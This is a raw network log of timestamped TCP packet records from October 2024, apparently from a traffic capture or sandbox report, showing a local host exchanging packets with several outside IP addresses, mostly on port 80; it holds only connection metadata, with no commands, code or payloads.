Oct 26, 2024 07:27:23.532075882 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532109022 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532140017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532151937 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532165051 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532175064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532186985 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532187939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532201052 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532207966 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532249928 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532278061 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532279968 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532295942 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532310009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532314062 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532315969 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532329082 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532340050 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532341003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532354116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532360077 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532368898 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532383919 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532392979 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532422066 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532618999 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532630920 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532643080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532655001 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532665968 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532668114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532676935 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532695055 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532696009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532708883 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532716036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532727957 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532731056 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532740116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532752037 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532753944 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532763958 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532764912 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532778978 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532787085 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532790899 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532805920 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532813072 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532816887 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532829046 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532834053 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532840967 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532855988 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532855988 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532866001 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532881021 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532882929 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532893896 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532900095 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532906055 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532911062 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532916069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532921076 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532922029 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532927990 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532932997 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532934904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532938957 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532943964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532951117 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532954931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532968998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532970905 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532982111 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.532990932 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.532991886 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.533006907 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.533008099 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.533032894 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.533056021 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.535139084 CEST	49988	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:23.536067009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.536078930 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.536091089 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.536108017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.536113024 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.536113977 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.536120892 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.536151886 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.536175013 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.536451101 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.536489010 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.536494017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.536504984 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.536524057 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.536526918 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.536547899 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.536547899 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.540497065 CEST	80	49988	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:23.540569067 CEST	49988	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:23.540848017 CEST	49988	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:23.546114922 CEST	80	49988	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:23.575505018 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.575557947 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.575582027 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.575589895 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.575594902 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.575599909 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.575629950 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.575846910 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.575858116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.575881958 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.575894117 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.575896978 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.575906992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.575917006 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.575920105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.575934887 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.575941086 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.575947046 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.575958967 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.575963020 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.575970888 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.575983047 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.575987101 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576004982 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576016903 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576025009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576037884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576049089 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576059103 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576064110 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576070070 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576072931 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576085091 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576096058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576102972 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576108932 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576118946 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576131105 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576134920 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576143026 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576148033 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576167107 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576173067 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576184034 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576195955 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576195002 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576208115 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576219082 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576220036 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576231003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576247931 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576248884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576255083 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576263905 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576265097 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576270103 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576276064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576281071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576291084 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576292992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576308012 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576318026 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576318979 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576332092 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576333046 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576345921 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576358080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576363087 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576385021 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576385975 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576396942 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576400995 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576410055 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576421976 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576422930 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576435089 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576451063 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576456070 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576463938 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576487064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.576487064 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576512098 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.576530933 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:24.010145903 CEST	49984	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:24.011544943 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:24.011573076 CEST	49987	40500	192.168.2.7	77.240.41.3
Oct 26, 2024 07:27:24.471875906 CEST	80	49988	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:24.473007917 CEST	49988	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:25.636468887 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:26.577915907 CEST	49988	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:30.437975883 CEST	49989	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:30.443686008 CEST	80	49989	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:30.443768978 CEST	49989	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:30.443917990 CEST	49989	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:30.449620008 CEST	80	49989	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:31.362966061 CEST	80	49989	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:31.363034964 CEST	80	49989	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:31.363040924 CEST	49989	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:31.363068104 CEST	80	49989	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:31.363081932 CEST	49989	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:31.363114119 CEST	49989	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:31.363120079 CEST	80	49989	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:31.363156080 CEST	80	49989	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:31.363188982 CEST	80	49989	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:31.363213062 CEST	49989	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:31.363224983 CEST	80	49989	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:31.363231897 CEST	49989	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:31.363276005 CEST	80	49989	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:31.363276958 CEST	49989	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:31.363311052 CEST	80	49989	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:31.363368988 CEST	49989	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:31.363374949 CEST	80	49989	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:31.363424063 CEST	49989	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:31.364703894 CEST	49989	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:31.364747047 CEST	49989	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:31.368818998 CEST	80	49989	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:31.368925095 CEST	80	49989	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:31.368979931 CEST	80	49989	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:31.368983984 CEST	49989	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:31.369024038 CEST	49989	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:32.394216061 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:32.399876118 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:32.399951935 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:32.400298119 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:32.405678988 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.391685963 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.391757965 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.391783953 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.391815901 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.391865015 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.391872883 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.391872883 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.391901016 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.391904116 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.391933918 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.391963959 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.391968966 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.391979933 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.392014980 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.392020941 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.392056942 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.392075062 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.392086983 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.392107010 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.392142057 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.398207903 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.398260117 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.398273945 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.398310900 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.398319006 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.398346901 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.398351908 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.398390055 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.550192118 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.550235033 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.550257921 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.550271034 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.550290108 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.550306082 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.550323963 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.550339937 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.550350904 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.550380945 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.550434113 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.550467968 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.550472975 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.550502062 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.550509930 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.550551891 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.550590038 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.550606012 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.550626993 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.550641060 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.550693035 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.550705910 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.550729036 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.550736904 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.550761938 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.550767899 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.550796032 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.550810099 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.550865889 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.551525116 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.551558971 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.551577091 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.551593065 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.551615000 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.551625967 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.551631927 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.551661015 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.551667929 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.551703930 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.552443027 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.552475929 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.552486897 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.552510023 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.552553892 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.706424952 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.706466913 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.706531048 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.706542015 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.706543922 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.706568956 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.706577063 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.706588030 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.706614017 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.706649065 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.706660032 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.706685066 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.706688881 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.706718922 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.706765890 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.707302094 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.707366943 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.707382917 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.707416058 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.707444906 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.707463980 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.707495928 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.707684994 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.707720041 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.707740068 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.707763910 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.707772017 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.707804918 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.707834005 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.707839012 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.707844973 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.707873106 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.707882881 CEST	49991	80	192.168.2.7	185.215.113.66
